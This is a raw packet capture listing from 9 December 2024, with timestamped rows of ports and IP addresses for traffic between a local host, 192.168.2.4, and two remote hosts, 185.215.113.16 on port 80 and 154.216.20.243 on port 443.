Dec 9, 2024 08:08:24.790337086 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.790385008 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.790678024 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.790741920 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.791991949 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.792041063 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.792079926 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.792124987 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.793623924 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.793672085 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.793699980 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.793741941 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.795348883 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.795393944 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.795407057 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.795449972 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.796890020 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.796933889 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.796933889 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.797000885 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.798525095 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.798579931 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.798629999 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.798676968 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.800141096 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.800195932 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.800234079 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.800282001 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.801784992 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.801834106 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.801944017 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.801987886 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.805272102 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.805320024 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.805936098 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.805984974 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.806683064 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.806695938 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.806735039 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.807677984 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.807725906 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.807872057 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.807918072 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.809426069 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.809443951 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.809484005 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.810806990 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.810817957 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.810852051 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.812483072 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.812494993 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.812531948 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.813903093 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.813915968 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.813946962 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.813971996 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.814870119 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.814912081 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.814980984 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.815018892 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.815881014 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.815907001 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.815953016 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.815965891 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.815989971 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.815999031 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.816523075 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.816581011 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.816884995 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.816929102 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.818234921 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.818283081 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.818356991 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.818403006 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.819864035 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.819933891 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.820022106 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.820061922 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.821455002 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.821485996 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.821511984 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.821525097 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.823056936 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.823108912 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.823137999 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.823196888 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.824666977 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.824714899 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.824752092 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.824796915 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.826312065 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.826366901 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.826390028 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.826436043 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.827941895 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.827991962 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.834716082 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.834733963 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.834815025 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.834830046 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.834881067 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.850589991 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.850608110 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.850681067 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.850692034 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.850730896 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.865302086 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.865324974 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.865369081 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.865377903 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.865411043 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.865432978 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.878412008 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.878443956 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.878510952 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.878519058 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.878566980 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.914165020 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.914182901 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.914247990 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.914263010 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.914307117 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.927268982 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.927284002 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.927351952 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.927361012 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.927397966 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.937653065 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.937711954 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.937776089 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.937827110 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.938361883 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.938409090 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.938477039 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.938523054 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.939835072 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.939879894 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.939959049 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.940002918 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.941586018 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.941601038 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.941636086 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.941648960 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.942594051 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.942641020 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.942790031 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.942831039 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.943969011 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.943998098 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.944031954 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.944077969 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.945313931 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.945359945 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.945398092 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.945445061 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.946640968 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.946683884 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.946751118 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.946794987 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.947994947 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.948038101 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.948105097 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.948149920 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.949311972 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.949356079 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.949407101 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.949450016 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.950624943 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.950670004 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.950705051 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.950747967 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.951906919 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.951961994 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.952018023 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.952059031 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.953243017 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.953289986 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.953347921 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.953393936 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.954638958 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.954685926 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.954761982 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.954808950 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.955868006 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.955914974 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.955988884 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.956036091 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.957168102 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.957216024 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.957251072 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.957297087 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.958476067 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.958520889 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.958564043 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.958606958 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.959784985 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.959832907 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.959907055 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.959950924 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.961083889 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.961124897 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.961168051 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.961206913 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.962542057 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.962584019 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.962661982 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.962708950 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.963713884 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.963753939 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.963839054 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.963881016 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.965183020 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.965202093 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.965225935 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.965245962 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.966322899 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.966368914 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.966404915 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.966449976 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.967644930 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.967686892 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.967751980 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.967796087 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.968980074 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.969023943 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.969053030 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.969098091 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.970243931 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.970285892 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.970339060 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.970383883 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.971554041 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.971600056 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.971661091 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.971704006 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.972883940 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.972930908 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.972971916 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.973017931 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.974174023 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.974219084 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.974283934 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.974329948 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.975470066 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.975513935 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.975574970 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.975626945 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.976793051 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.976810932 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.976835966 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.976856947 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.978131056 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.978177071 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.978235006 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.978275061 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.979393005 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.979438066 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.979511023 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.979554892 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.980705023 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.980750084 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.980988026 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.981033087 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.982004881 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.982050896 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.982108116 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.982147932 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.983361959 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.983411074 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.983479023 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.983519077 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.984620094 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.984664917 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.984702110 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.984744072 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.985949993 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.986018896 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.986040115 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.986083031 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.987266064 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.987309933 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.987354040 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.987399101 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.988576889 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.988627911 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.988780975 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.988826036 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.989876986 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.989922047 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.989995956 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.990037918 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.991195917 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.991245031 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.991329908 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.991373062 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.992486000 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.992531061 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.992594957 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.992638111 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.993779898 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.993828058 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.993828058 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.993870974 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.995388031 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.995433092 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.995506048 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.995546103 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.996475935 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.996515989 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.996552944 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.996598005 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.997705936 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.997750998 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.997803926 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.997847080 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.999085903 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.999098063 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.999130964 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.999142885 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.000365019 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.000381947 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.000410080 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.000422955 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.001652002 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.001703024 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.001705885 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.001714945 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.001719952 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.001832962 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.001843929 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.001873970 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.001898050 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.002968073 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.003010988 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.003011942 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.003052950 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.004304886 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.004324913 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.004345894 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.004359961 CET	49807	80	192.168.2.4	185.215.113.16
